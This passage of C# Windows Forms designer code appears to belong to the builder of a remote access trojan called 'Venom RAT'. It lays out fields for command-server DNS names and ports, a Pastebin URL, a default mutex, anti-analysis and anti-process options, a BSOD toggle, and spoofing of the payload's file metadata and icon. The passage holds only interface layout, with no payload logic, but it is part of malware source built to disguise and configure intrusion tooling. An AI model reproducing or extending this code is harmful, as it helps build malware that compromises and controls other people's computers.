            this.txtGroup.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtGroup.FocusedState.Parent = this.txtGroup;
            this.txtGroup.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtGroup.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtGroup.HoverState.Parent = this.txtGroup;
            this.txtGroup.Location = new System.Drawing.Point(685, 362);
            this.txtGroup.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtGroup.Name = "txtGroup";
            this.txtGroup.PasswordChar = '\0';
            this.txtGroup.PlaceholderText = "";
            this.txtGroup.SelectedText = "";
            this.txtGroup.SelectionStart = 13;
            this.txtGroup.ShadowDecoration.Parent = this.txtGroup;
            this.txtGroup.Size = new System.Drawing.Size(303, 32);
            this.txtGroup.TabIndex = 133;
            this.txtMutex.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtMutex.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtMutex.DefaultText = "Venom_RAT_Mutex";
            this.txtMutex.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtMutex.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtMutex.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtMutex.DisabledState.Parent = this.txtMutex;
            this.txtMutex.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtMutex.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtMutex.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtMutex.FocusedState.Parent = this.txtMutex;
            this.txtMutex.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtMutex.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtMutex.HoverState.Parent = this.txtMutex;
            this.txtMutex.Location = new System.Drawing.Point(685, 400);
            this.txtMutex.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtMutex.Name = "txtMutex";
            this.txtMutex.PasswordChar = '\0';
            this.txtMutex.PlaceholderText = "";
            this.txtMutex.SelectedText = "";
            this.txtMutex.ShadowDecoration.Parent = this.txtMutex;
            this.txtMutex.Size = new System.Drawing.Size(195, 32);
            this.txtMutex.TabIndex = 134;
            this.label17.AutoSize = true;
            this.label17.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label17.ForeColor = System.Drawing.Color.White;
            this.label17.Location = new System.Drawing.Point(188, 374);
            this.label17.Name = "label17";
            this.label17.Size = new System.Drawing.Size(112, 20);
            this.label17.TabIndex = 131;
            this.label17.Text = "Clients Group";
            this.label5.AutoSize = true;
            this.label5.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label5.ForeColor = System.Drawing.Color.White;
            this.label5.Location = new System.Drawing.Point(188, 412);
            this.label5.Name = "label5";
            this.label5.Size = new System.Drawing.Size(54, 20);
            this.label5.TabIndex = 132;
            this.label5.Text = "Mutex";
            this.textIP.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.textIP.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.textIP.DefaultText = "";
            this.textIP.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.textIP.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.textIP.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.textIP.DisabledState.Parent = this.textIP;
            this.textIP.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.textIP.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.textIP.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.textIP.FocusedState.Parent = this.textIP;
            this.textIP.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.textIP.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.textIP.HoverState.Parent = this.textIP;
            this.textIP.Location = new System.Drawing.Point(192, 124);
            this.textIP.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.textIP.Name = "textIP";
            this.textIP.PasswordChar = '\0';
            this.textIP.PlaceholderText = "";
            this.textIP.SelectedText = "";
            this.textIP.ShadowDecoration.Parent = this.textIP;
            this.textIP.Size = new System.Drawing.Size(303, 32);
            this.textIP.TabIndex = 126;
            this.txtPaste_bin.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtPaste_bin.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtPaste_bin.DefaultText = "DNS Url";
            this.txtPaste_bin.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtPaste_bin.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtPaste_bin.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtPaste_bin.DisabledState.Parent = this.txtPaste_bin;
            this.txtPaste_bin.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtPaste_bin.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtPaste_bin.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtPaste_bin.FocusedState.Parent = this.txtPaste_bin;
            this.txtPaste_bin.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtPaste_bin.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtPaste_bin.HoverState.Parent = this.txtPaste_bin;
            this.txtPaste_bin.Location = new System.Drawing.Point(685, 322);
            this.txtPaste_bin.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtPaste_bin.Name = "txtPaste_bin";
            this.txtPaste_bin.PasswordChar = '\0';
            this.txtPaste_bin.PlaceholderText = "";
            this.txtPaste_bin.SelectedText = "";
            this.txtPaste_bin.ShadowDecoration.Parent = this.txtPaste_bin;
            this.txtPaste_bin.Size = new System.Drawing.Size(303, 32);
            this.txtPaste_bin.TabIndex = 126;
            this.textPort.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.textPort.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.textPort.DefaultText = "";
            this.textPort.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.textPort.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.textPort.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.textPort.DisabledState.Parent = this.textPort;
            this.textPort.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.textPort.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.textPort.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.textPort.FocusedState.Parent = this.textPort;
            this.textPort.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.textPort.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.textPort.HoverState.Parent = this.textPort;
            this.textPort.Location = new System.Drawing.Point(685, 124);
            this.textPort.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.textPort.Name = "textPort";
            this.textPort.PasswordChar = '\0';
            this.textPort.PlaceholderText = "";
            this.textPort.SelectedText = "";
            this.textPort.ShadowDecoration.Parent = this.textPort;
            this.textPort.Size = new System.Drawing.Size(303, 32);
            this.textPort.TabIndex = 126;
            this.btnRemoveIP.Animated = true;
            this.btnRemoveIP.BorderColor = System.Drawing.Color.Maroon;
            this.btnRemoveIP.BorderRadius = 5;
            this.btnRemoveIP.CheckedState.Parent = this.btnRemoveIP;
            this.btnRemoveIP.CustomImages.Parent = this.btnRemoveIP;
            this.btnRemoveIP.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnRemoveIP.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnRemoveIP.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnRemoveIP.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnRemoveIP.DisabledState.Parent = this.btnRemoveIP;
            this.btnRemoveIP.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnRemoveIP.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnRemoveIP.ForeColor = System.Drawing.Color.White;
            this.btnRemoveIP.HoverState.Parent = this.btnRemoveIP;
            this.btnRemoveIP.Location = new System.Drawing.Point(360, 224);
            this.btnRemoveIP.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnRemoveIP.Name = "btnRemoveIP";
            this.btnRemoveIP.ShadowDecoration.Parent = this.btnRemoveIP;
            this.btnRemoveIP.Size = new System.Drawing.Size(135, 34);
            this.btnRemoveIP.TabIndex = 125;
            this.btnRemoveIP.Text = "Remove DNS";
            this.btnRemoveIP.Click += new System.EventHandler(this.BtnRemoveIP_Click);
            this.btnRemovePort.Animated = true;
            this.btnRemovePort.BorderColor = System.Drawing.Color.Maroon;
            this.btnRemovePort.BorderRadius = 5;
            this.btnRemovePort.CheckedState.Parent = this.btnRemovePort;
            this.btnRemovePort.CustomImages.Parent = this.btnRemovePort;
            this.btnRemovePort.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnRemovePort.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnRemovePort.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnRemovePort.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnRemovePort.DisabledState.Parent = this.btnRemovePort;
            this.btnRemovePort.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnRemovePort.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnRemovePort.ForeColor = System.Drawing.Color.White;
            this.btnRemovePort.HoverState.Parent = this.btnRemovePort;
            this.btnRemovePort.Location = new System.Drawing.Point(853, 224);
            this.btnRemovePort.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnRemovePort.Name = "btnRemovePort";
            this.btnRemovePort.ShadowDecoration.Parent = this.btnRemovePort;
            this.btnRemovePort.Size = new System.Drawing.Size(135, 34);
            this.btnRemovePort.TabIndex = 125;
            this.btnRemovePort.Text = "Remove Port";
            this.btnRemovePort.Click += new System.EventHandler(this.BtnRemovePort_Click);
            this.btnAddIP.Animated = true;
            this.btnAddIP.BorderColor = System.Drawing.Color.Maroon;
            this.btnAddIP.BorderRadius = 5;
            this.btnAddIP.CheckedState.Parent = this.btnAddIP;
            this.btnAddIP.CustomImages.Parent = this.btnAddIP;
            this.btnAddIP.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnAddIP.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnAddIP.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnAddIP.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnAddIP.DisabledState.Parent = this.btnAddIP;
            this.btnAddIP.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnAddIP.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnAddIP.ForeColor = System.Drawing.Color.White;
            this.btnAddIP.HoverState.Parent = this.btnAddIP;
            this.btnAddIP.Location = new System.Drawing.Point(192, 224);
            this.btnAddIP.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnAddIP.Name = "btnAddIP";
            this.btnAddIP.ShadowDecoration.Parent = this.btnAddIP;
            this.btnAddIP.Size = new System.Drawing.Size(135, 34);
            this.btnAddIP.TabIndex = 125;
            this.btnAddIP.Text = "Add DNS";
            this.btnAddIP.Click += new System.EventHandler(this.BtnAddIP_Click);
            this.btnAddPort.Animated = true;
            this.btnAddPort.BorderColor = System.Drawing.Color.Maroon;
            this.btnAddPort.BorderRadius = 5;
            this.btnAddPort.CheckedState.Parent = this.btnAddPort;
            this.btnAddPort.CustomImages.Parent = this.btnAddPort;
            this.btnAddPort.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnAddPort.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnAddPort.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnAddPort.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnAddPort.DisabledState.Parent = this.btnAddPort;
            this.btnAddPort.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnAddPort.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnAddPort.ForeColor = System.Drawing.Color.White;
            this.btnAddPort.HoverState.Parent = this.btnAddPort;
            this.btnAddPort.Location = new System.Drawing.Point(685, 224);
            this.btnAddPort.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnAddPort.Name = "btnAddPort";
            this.btnAddPort.ShadowDecoration.Parent = this.btnAddPort;
            this.btnAddPort.Size = new System.Drawing.Size(135, 34);
            this.btnAddPort.TabIndex = 125;
            this.btnAddPort.Text = "Add Port";
            this.btnAddPort.Click += new System.EventHandler(this.BtnAddPort_Click);
            this.tabPage2.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.tabPage2.Controls.Add(this.guna2ShadowPanel4);
            this.tabPage2.Location = new System.Drawing.Point(4, 44);
            this.tabPage2.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.tabPage2.Name = "tabPage2";
            this.tabPage2.Padding = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.tabPage2.Size = new System.Drawing.Size(1272, 606);
            this.tabPage2.TabIndex = 1;
            this.tabPage2.Text = "Startup";
            this.guna2ShadowPanel4.BackColor = System.Drawing.Color.Transparent;
            this.guna2ShadowPanel4.Controls.Add(this.textFilename);
            this.guna2ShadowPanel4.Controls.Add(this.chkAnti);
            this.guna2ShadowPanel4.Controls.Add(this.chkAntiProcess);
            this.guna2ShadowPanel4.Controls.Add(this.checkBox1);
            this.guna2ShadowPanel4.Controls.Add(this.label19);
            this.guna2ShadowPanel4.Controls.Add(this.label6);
            this.guna2ShadowPanel4.Controls.Add(this.numDelay);
            this.guna2ShadowPanel4.Controls.Add(this.comboBoxFolder);
            this.guna2ShadowPanel4.Controls.Add(this.label3);
            this.guna2ShadowPanel4.Controls.Add(this.label4);
            this.guna2ShadowPanel4.Controls.Add(this.label16);
            this.guna2ShadowPanel4.Controls.Add(this.label18);
            this.guna2ShadowPanel4.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.guna2ShadowPanel4.Location = new System.Drawing.Point(49, 39);
            this.guna2ShadowPanel4.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2ShadowPanel4.Name = "guna2ShadowPanel4";
            this.guna2ShadowPanel4.ShadowColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2ShadowPanel4.ShadowDepth = 200;
            this.guna2ShadowPanel4.ShadowShift = 7;
            this.guna2ShadowPanel4.Size = new System.Drawing.Size(1172, 514);
            this.guna2ShadowPanel4.TabIndex = 122;
            this.textFilename.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.textFilename.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.textFilename.DefaultText = "";
            this.textFilename.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.textFilename.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.textFilename.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.textFilename.DisabledState.Parent = this.textFilename;
            this.textFilename.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.textFilename.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.textFilename.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.textFilename.FocusedState.Parent = this.textFilename;
            this.textFilename.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.textFilename.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.textFilename.HoverState.Parent = this.textFilename;
            this.textFilename.Location = new System.Drawing.Point(543, 188);
            this.textFilename.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.textFilename.Name = "textFilename";
            this.textFilename.PasswordChar = '\0';
            this.textFilename.PlaceholderText = "";
            this.textFilename.SelectedText = "";
            this.textFilename.ShadowDecoration.Parent = this.textFilename;
            this.textFilename.Size = new System.Drawing.Size(253, 32);
            this.textFilename.TabIndex = 129;
            this.chkAnti.CheckedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(94)))), ((int)(((byte)(148)))), ((int)(((byte)(255)))));
            this.chkAnti.CheckedState.BorderRadius = 2;
            this.chkAnti.CheckedState.BorderThickness = 0;
            this.chkAnti.CheckedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.chkAnti.CheckedState.Parent = this.chkAnti;
            this.chkAnti.Location = new System.Drawing.Point(297, 309);
            this.chkAnti.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.chkAnti.Name = "chkAnti";
            this.chkAnti.ShadowDecoration.Parent = this.chkAnti;
            this.chkAnti.Size = new System.Drawing.Size(32, 30);
            this.chkAnti.TabIndex = 128;
            this.chkAnti.Text = "guna2CustomCheckBox1";
            this.chkAnti.UncheckedState.BorderColor = System.Drawing.Color.Transparent;
            this.chkAnti.UncheckedState.BorderRadius = 2;
            this.chkAnti.UncheckedState.BorderThickness = 0;
            this.chkAnti.UncheckedState.FillColor = System.Drawing.Color.Transparent;
            this.chkAnti.UncheckedState.Parent = this.chkAnti;
            this.chkAnti.Click += new System.EventHandler(this.checkBox1_CheckedChanged);
            this.chkAntiProcess.CheckedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(94)))), ((int)(((byte)(148)))), ((int)(((byte)(255)))));
            this.chkAntiProcess.CheckedState.BorderRadius = 2;
            this.chkAntiProcess.CheckedState.BorderThickness = 0;
            this.chkAntiProcess.CheckedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.chkAntiProcess.CheckedState.Parent = this.chkAntiProcess;
            this.chkAntiProcess.Location = new System.Drawing.Point(563, 309);
            this.chkAntiProcess.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.chkAntiProcess.Name = "chkAntiProcess";
            this.chkAntiProcess.ShadowDecoration.Parent = this.chkAntiProcess;
            this.chkAntiProcess.Size = new System.Drawing.Size(32, 30);
            this.chkAntiProcess.TabIndex = 128;
            this.chkAntiProcess.Text = "guna2CustomCheckBox1";
            this.chkAntiProcess.UncheckedState.BorderColor = System.Drawing.Color.Transparent;
            this.chkAntiProcess.UncheckedState.BorderRadius = 2;
            this.chkAntiProcess.UncheckedState.BorderThickness = 0;
            this.chkAntiProcess.UncheckedState.FillColor = System.Drawing.Color.Transparent;
            this.chkAntiProcess.UncheckedState.Parent = this.chkAntiProcess;
            this.chkAntiProcess.Click += new System.EventHandler(this.checkBox1_CheckedChanged);
            this.checkBox1.CheckedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(94)))), ((int)(((byte)(148)))), ((int)(((byte)(255)))));
            this.checkBox1.CheckedState.BorderRadius = 2;
            this.checkBox1.CheckedState.BorderThickness = 0;
            this.checkBox1.CheckedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.checkBox1.CheckedState.Parent = this.checkBox1;
            this.checkBox1.Location = new System.Drawing.Point(297, 139);
            this.checkBox1.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.checkBox1.Name = "checkBox1";
            this.checkBox1.ShadowDecoration.Parent = this.checkBox1;
            this.checkBox1.Size = new System.Drawing.Size(32, 30);
            this.checkBox1.TabIndex = 128;
            this.checkBox1.Text = "guna2CustomCheckBox1";
            this.checkBox1.UncheckedState.BorderColor = System.Drawing.Color.Transparent;
            this.checkBox1.UncheckedState.BorderRadius = 2;
            this.checkBox1.UncheckedState.BorderThickness = 0;
            this.checkBox1.UncheckedState.FillColor = System.Drawing.Color.Transparent;
            this.checkBox1.UncheckedState.Parent = this.checkBox1;
            this.checkBox1.Click += new System.EventHandler(this.checkBox1_CheckedChanged);
            this.tabPage3.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.tabPage3.Controls.Add(this.guna2ShadowPanel3);
            this.tabPage3.Controls.Add(this.chkBsod);
            this.tabPage3.Location = new System.Drawing.Point(4, 44);
            this.tabPage3.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.tabPage3.Name = "tabPage3";
            this.tabPage3.Padding = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.tabPage3.Size = new System.Drawing.Size(1272, 606);
            this.tabPage3.TabIndex = 2;
            this.tabPage3.Text = "Assembly";
            this.guna2ShadowPanel3.BackColor = System.Drawing.Color.Transparent;
            this.guna2ShadowPanel3.Controls.Add(this.txtIcon);
            this.guna2ShadowPanel3.Controls.Add(this.txtProductVersion);
            this.guna2ShadowPanel3.Controls.Add(this.txtFileVersion);
            this.guna2ShadowPanel3.Controls.Add(this.txtTrademarks);
            this.guna2ShadowPanel3.Controls.Add(this.txtCompany);
            this.guna2ShadowPanel3.Controls.Add(this.txtDescription);
            this.guna2ShadowPanel3.Controls.Add(this.txtProduct);
            this.guna2ShadowPanel3.Controls.Add(this.txtCopyright);
            this.guna2ShadowPanel3.Controls.Add(this.txtOriginalFilename);
            this.guna2ShadowPanel3.Controls.Add(this.btnAssembly);
            this.guna2ShadowPanel3.Controls.Add(this.chkIcon);
            this.guna2ShadowPanel3.Controls.Add(this.btnClone);
            this.guna2ShadowPanel3.Controls.Add(this.btnIcon);
            this.guna2ShadowPanel3.Controls.Add(this.picIcon);
            this.guna2ShadowPanel3.Controls.Add(this.label8);
            this.guna2ShadowPanel3.Controls.Add(this.label7);
            this.guna2ShadowPanel3.Controls.Add(this.label9);
            this.guna2ShadowPanel3.Controls.Add(this.label10);
            this.guna2ShadowPanel3.Controls.Add(this.label11);
            this.guna2ShadowPanel3.Controls.Add(this.label12);
            this.guna2ShadowPanel3.Controls.Add(this.label13);
            this.guna2ShadowPanel3.Controls.Add(this.label15);
            this.guna2ShadowPanel3.Controls.Add(this.label14);
            this.guna2ShadowPanel3.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.guna2ShadowPanel3.Location = new System.Drawing.Point(55, 46);
            this.guna2ShadowPanel3.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2ShadowPanel3.Name = "guna2ShadowPanel3";
            this.guna2ShadowPanel3.ShadowColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2ShadowPanel3.ShadowDepth = 200;
            this.guna2ShadowPanel3.ShadowShift = 7;
            this.guna2ShadowPanel3.Size = new System.Drawing.Size(1164, 514);
            this.guna2ShadowPanel3.TabIndex = 0;
            this.txtIcon.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtIcon.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtIcon.DefaultText = "";
            this.txtIcon.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtIcon.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtIcon.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtIcon.DisabledState.Parent = this.txtIcon;
            this.txtIcon.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtIcon.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtIcon.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtIcon.FocusedState.Parent = this.txtIcon;
            this.txtIcon.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtIcon.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtIcon.HoverState.Parent = this.txtIcon;
            this.txtIcon.Location = new System.Drawing.Point(733, 142);
            this.txtIcon.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtIcon.Name = "txtIcon";
            this.txtIcon.PasswordChar = '\0';
            this.txtIcon.PlaceholderText = "";
            this.txtIcon.SelectedText = "";
            this.txtIcon.ShadowDecoration.Parent = this.txtIcon;
            this.txtIcon.Size = new System.Drawing.Size(253, 32);
            this.txtIcon.TabIndex = 130;
            this.txtProductVersion.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtProductVersion.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtProductVersion.DefaultText = "";
            this.txtProductVersion.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
